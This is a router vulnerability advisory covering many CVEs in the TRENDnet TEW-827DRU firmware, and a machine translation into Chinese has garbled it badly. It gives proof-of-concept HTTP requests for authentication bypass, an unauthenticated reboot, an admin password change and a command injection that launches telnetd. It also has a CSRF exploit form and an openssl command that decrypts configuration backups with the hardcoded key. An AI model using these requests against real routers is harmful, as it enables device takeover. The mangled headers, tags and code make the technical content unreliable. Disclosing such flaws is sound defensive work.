脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Trendnet AC2600东奔西走- 827德鲁多个漏洞

至关重要的

剧情简介

不适当的防火墙规则,cve - 2021 - 20149

的默认iptables规则集管理设备上的服务只适用于IPv4。所有服务设备上运行通过WAN接口默认通过IPv6。

我们已经安排了一个CVSS向量的AV: N /交流:L /公关:N / UI: N / S: U / C: L /我:L / L这个问题。

通过设置向导——信息披露cve - 2021 - 20150

可以绕过身份验证,用户可以查看信息管理员通过手动浏览安装向导,并迫使它重定向到所需的页面。下面是一个示例请求:

POST / apply_sec。cgi HTTP / 1.1
主持人:192.168.10.1
用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 91.0)壁虎/ 20100101 / 91.0
接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp /; q = 0.8
接收语言:en - us, en; q = 0.5
接受编码:gzip压缩
内容类型:应用程序/ x-www-form-urlencoded
内容长度:107
来源:http://192.168.10.1
连接:关闭
推荐人:http://192.168.10.1/setup_wizard.asp
饼干:compact_display_state = false
Upgrade-Insecure-Requests: 1

action = setup_wizard_cancel&html_response_page = client_status.asp&html_response_return_page = client_status.asp

在我们的测试中,我们通过这个绕过无法执行操作,但它可以用于访问页面敏感信息,如密码、系统日志等。例如,使用这种绕过访问FTP设置页面将显示用户帐户和密码(如果配置)响应中的文本。

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:N / UI: N / S: U / C: L /我:N / a:这个问题。

认证绕过由于基于IP会话处理-cve - 2021 - 20151

路由器的管理软件管理web会话基于IP地址而不是验证客户机cookie会话令牌/等。这允许攻击者(无论从不同的电脑、不同的web浏览器在同一台机器上,等等)来接管现有的会话。这确实需要攻击者能够恶搞或接管原始IP地址的原始用户的会话。

我们已经安排了这个问题一个CVSS向量的AV: N /交流:H /公关:N / UI: N / S: U / C: L /我:L / L这个问题。

缺乏足够的CSRF保护- cve - 2021 - 20165

大多数页面缺乏适当的使用CSRF保护或移植。此外,页面使用CSRF令牌是非常bypassable如服务器似乎并不正确验证它们(即重用旧的令牌或发现令牌通过其他一些方法是可能的)。

例如,下面的概念验证演示能力改变FTP用户(成立)密码“sapphire123”重用一个虚假的令牌。

< html >

<身体>

<脚本>历史。pushState(“,”,“/”) > < /脚本

action = " http://192.168.10.1/apply <形式。cgi”方法= " POST " >

< input type = "隐藏" name =“共产党# 95;行为”value = "设置" / >

< input type = "隐藏" name = " html # 95;响应# 95;返回# 95;页面" value = " ftpserver& # 46; asp " / >

< input type = "隐藏" name = "行动"价值= " proftp " / >

< input type = "隐藏" name = " usbapps& # 46;配置# 46;ftp # 95;行政与# 95;通过“价值=“RL8F6ES& # 64;”/>

< input type = "隐藏" name = " usbapps& # 46;配置# 46;ftp # 95;行政与# 95;“value = " admin " / >

< input type = "隐藏" name = " usbapps& # 46;配置# 46;ftp # 95;使" value = " 1 " / >

< input type = "隐藏" name = " usbapps& # 46;配置# 46;auth # 95;使" value = " 1 " / >

< input type = "隐藏" name = " usbapps& # 46;配置# 46;accwan& # 95;使" value = " 0 " / >

< input type = "隐藏" name = " usbapps& # 46;配置# 46;ftp # 95;代码页" value = " 6 " / >

< input type = "隐藏" name = " usbapps& # 46; & # 64; ftp # 91; 0 & # 93; & # 46;用户名" value = "的" / >

< input type = "隐藏" name = " usbapps& # 46; & # 64; ftp # 91; 0 & # 93; & # 46;密码" value = " sapphire123 " / >

< input type = "隐藏" name = " usbapps& # 46; & # 64; ftp # 91; 0 & # 93; & # 46;许可" value = " 15 " / >

< input type = "隐藏" name = " usbapps& # 46; & # 64; ftp # 91; 0 & # 93; & # 46;使“value = " 1 " / >

< input type = "隐藏" name = "重启# 95;类型”value = "应用# 43;过滤" / >

< input type = "隐藏" name =“1631133900682”value = " 1631133900682 " / >

< input type = " submit " value = " submit请求" / >

> < /形式

< /身体>

< / html >

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:N / UI: R / S: U / C: H /我:H: H。

缺乏对bt的身份验证功能- cve - 2021 - 20152

如果启用,任何人都可以访问和修改设置和文件通过欧洲web客户端通过访问:http://192.168.10.1:9091 /传输/网络/

我们已经安排了这个问题一个CVSS向量的AV: N /交流:H /公关:N / UI: N / S: U / C: L /我:L /答:N。

符号链接攻击通过Bittorrent功能- cve - 2021 - 20153

如果启用,bt功能是容易受到符号链接攻击可能导致代码执行到设备上。如果一个终端用户插入一个闪存驱动器有一个恶意的符号链接,下载bt客户端可以写,然后用户可以任意文件下载到设备上的任何期望位置文件系统,这可能会导致代码的执行。示例目录容易受到这种包括“配置”、“下载”、“激流”,但应该注意的是,“下载”是唯一的向量,可以将任意文件下载到任意位置。

例如,下面的符号链接可以下载写入/根目录,而不是预期的usb设备:

root@tew - 827德鲁:# ls /过程/ tmp / ftp_share / usb_A1 /
4096年9月2 20:48 drwxrwxrwx 1根根。
drwxr-xr-x 3根根60 9月2 13:26 . .
lrwxrwxrwx 1根2根9月20日20:46配置- > /root/
lrwxrwxrwx 1根根10 9月2日20:49下载- > /root/
lrwxrwxrwx 1根根9月20日2 20:48激流- > /root/

它不显示FTP或SMB功能是受这个问题的影响服务chroot usb驱动器的安装目录。

我们已经安排了这个问题一个CVSS向量的AV: P /交流:H /公关:N / UI: N / S: U / C: H /我:H: H。

默认情况下缺乏HTTPS - cve - 2021 - 20154

默认情况下没有启用HTTPS在设备上。这导致明文密码等敏感信息的传播。

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:N / UI: N / S: U / C: L /我:N: N。

能够修改内部设备配置- cve - 2021 - 20155

可以通过网络备份和恢复设备配置管理接口。这些设备使用硬编码的密码加密的“12345678”。以下命令将解密这些配置文件:

openssl aes - 256 - cbc - d base64通过传递:12345678——东奔西走- 827 dru_config。本治疗out.bin

这些文件可以修改,对,并上传到服务器,它允许一个用户或攻击者修改设置,否则意想不到的要修改的。这种攻击,当结合其他本报告所描述的,在设备上可能导致代码执行。

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:S / UI: N / S: U / C: H /我:H: H。

能够安装修改固件- cve - 2021 - 20156

可以手动安装固件可能是恶意的,因为似乎没有做任何签名验证来确定从一个已知的和可信的源。这包括固件更新通过自动化的“检查更新”在管理界面。如果攻击者能够伪装成更新服务器,设备不会验证固件更新下载是合法的。

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:S / UI: N / S: U / C: H /我:H: H。

未经身份验证的拒绝服务通过重启- cve - 2021 - 20157

可能对于一个未经身份验证的,恶意用户强制设备重启通过以下要求:

POST / apply_sec。cgi HTTP / 1.1
主持人:192.168.10.1
用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 91.0)壁虎/ 20100101 / 91.0
接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8
接收语言:en - us, en; q = 0.5
接受编码:gzip压缩
内容类型:应用程序/ x-www-form-urlencoded
内容长度:128
来源:http://192.168.10.1
连接:关闭
推荐人:http://192.168.10.1/setup_wizard.asp
饼干:compact_display_state = false
Upgrade-Insecure-Requests: 1

ccp_act =建立行动= tools_admin_elecom&html_response_page =等/ passwd&html_response_return_page = basic_settings.asp&command =重启

我们已经安排了这个问题一个CVSS向量的AV: N /交流:L /公关:N / UI: N / S: U / C: N /我:N / a: H。

未经身份验证的管理密码更改- cve - 2021 - 20158

有可能未经过身份验证的,malicous演员力的变化管理密码。以下请求显示更改管理员密码“testing123”:

POST / apply_sec。cgi HTTP / 1.1
主持人:192.168.10.1
用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 91.0)壁虎/ 20100101 / 91.0
接受:text / html, application / xhtml + xml应用程序/ xml; q = 0.9,图像/ webp * / *; q = 0.8
接收语言:en - us, en; q = 0.5
接受编码:gzip压缩
内容类型:应用程序/ x-www-form-urlencoded
内容长度:145
来源:http://192.168.10.1
连接:关闭
推荐人:http://192.168.10.1/setup_wizard.asp
饼干:compact_display_state = false
Upgrade-Insecure-Requests: 1

ccp_act =建立行动= tools_admin_elecom&html_response_page = dummy_value&html_response_return_page = dummy_value&method = tools&admin_password = testing123

有可能改变其他参数使用这种方法,但是考虑到有更容易的方法来实现代码执行(如其他的例子在这个公开的电子邮件),我们选择最严重的例子。

我们已经安排了这个问题的CVSS AV: N /交流:L /公关:N / UI: N / S: U / C: H /我:H: H。

命令注入通过Syslog功能- cve - 2021 - 20159

如果正确配置(默认情况下),syslogd启动期间产生。如果一个畸形的参数配置文件和提供设备重启,syslogd不会正常产卵。

当访问syslog配置页面(adm_syslog.asp),后端服务器检查syslogd正在运行。如果不是,尝试运行它,它是由一个系统接受用户可控的输入()调用。

这个漏洞的利用链如下:发送请求cameo.cameo腐败syslog命令文件和更改。syslog_server参数包含一个注入命令>重启设备>访问syslog来触发系统配置页面()调用>命令运行。

下面的请求都将腐败的配置文件和提供必要的syslog_server参数注入。可以容易地验证概念证明利用设备的UART的外壳,可以显示进程清单确认已经运行的命令。Telnetd使用如下一个例子。

POST /应用。cgi HTTP / 1.1
主持人:192.168.10.1
用户代理:Mozilla / 5.0(麦金塔电脑;Intel Mac OS X 10.15;房车:Firefox 91.0)壁虎/ 20100101 / 91.0
接受:* / *
接收语言:en - us, en; q = 0.5
接受编码:gzip压缩
内容类型:应用程序/ x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
内容长度:363
来源:http://192.168.10.1
连接:关闭
推荐人:http://192.168.10.1/adm_syslog.asp
饼干:compact_display_state = false


ccp_act = set&html_response_return_page = adm_syslog.asp&action = 2 f192.168.1.102:1234 % 3 btelnetd tools_syslog&reboot_type = application&cameo.cameo.syslog_server = 1% % 3 b&cameo.log.enable = 1 &cameo.log.server = break_config&cameo.log.log_system_activity = 1 &cameo.log.log_attacks = 1 &cameo.log.log_notice = 1 &cameo.log.log_debug_information = 1 &1629923014463 = 1629923014463

我们已经安排了这个问题的CVSS AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H。

命令注入通过Samba配置的主机名参数- cve - 2021 - 20160

当修改配置值的SMB功能设备,以下系统()执行并利用用户可控参数:

系统(“deluser % s”, smb_admin_name);

虽然这个变量是安全的检索与uci_safe_get(),()调用的系统仍然容易受到命令注入。

我们已经安排了这个问题的CVSS AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H。

UART的保护不足- cve - 2021 - 20161

恶意的演员与物理访问设备能够连接到UART通过串行连接端口。不需要用户名和密码,用户给出一个根壳完全控制的设备。

我们已经安排了这个问题的CVSS AV: P /交流:L /公关:N / UI: N / S: U / C: H /我:H: H。

用户名和密码存储不当- cve - 2021 - 20162

用户名和密码存储在设备上的配置文件的明文。例如,/etc/config/cameo包含admin密码明文。

我们已经安排了这个问题的CVSS AV: N /交流:H /公关:H / UI: N / S: U / C: H /我:N: N。

通过ftpserver信息披露。asp - cve - 2021 - 20163

所有ftp用户用户名和密码显示在ftpserver明文。asp页面。

我们已经安排了这个问题的CVSS AV: N /交流:H /公关:H / UI: N / S: U / C: L /我:N: N。

信息披露通过samba配置页面- cve - 2021 - 20164

中所有smb用户显示用户名和密码明文smbserver。asp页面。

我们已经安排了这个问题的CVSS AV: N /交流:H /公关:H / UI: N / S: U / C: L /我:N: N。

脆弱的jquery库

已知脆弱的jquery库的多个实例使用在设备上:jquery 1.3.2。分钟,1.3.1.min。

解决方案

应用供应商提供的补丁时可用。本文时咨询、站得住脚的没有意识到这些问题可用的补丁。

披露时间表

2021年9月9日——站得住脚的请求来自供应商的安全联系。
2021年9月16日——站得住脚的第二次接触尝试。
2021年9月23日——站得住脚的第三个和最后一个接触的尝试。供应商响应与联系方式。
2021年9月27日,成立透露供应商。
2021年10月12日—站得住脚的请求状态更新。
2021年10月13日—供应商请求澄清一些问题。站得住脚的提供澄清。
2021年10月19日—供应商请求澄清一些问题。
2021年10月21日——站得住脚的提供澄清。
2021年11月12日—供应商提供状态更新。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2021 - 54
信贷

吉米Sebree

CVSSv3基地/时间的分数
9.8/9.2
CVSSv3向量
AV: N /交流:L /公关:N / UI: N / S: U / C: H /我:H: H
受影响的产品
Trendnet AC2600东奔西走- 827德鲁固件
风险因素
至关重要的

咨询时间

2021年12月30日——最初版本。
2021年12月31日-删除“偏远”的描述当地的攻击。

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map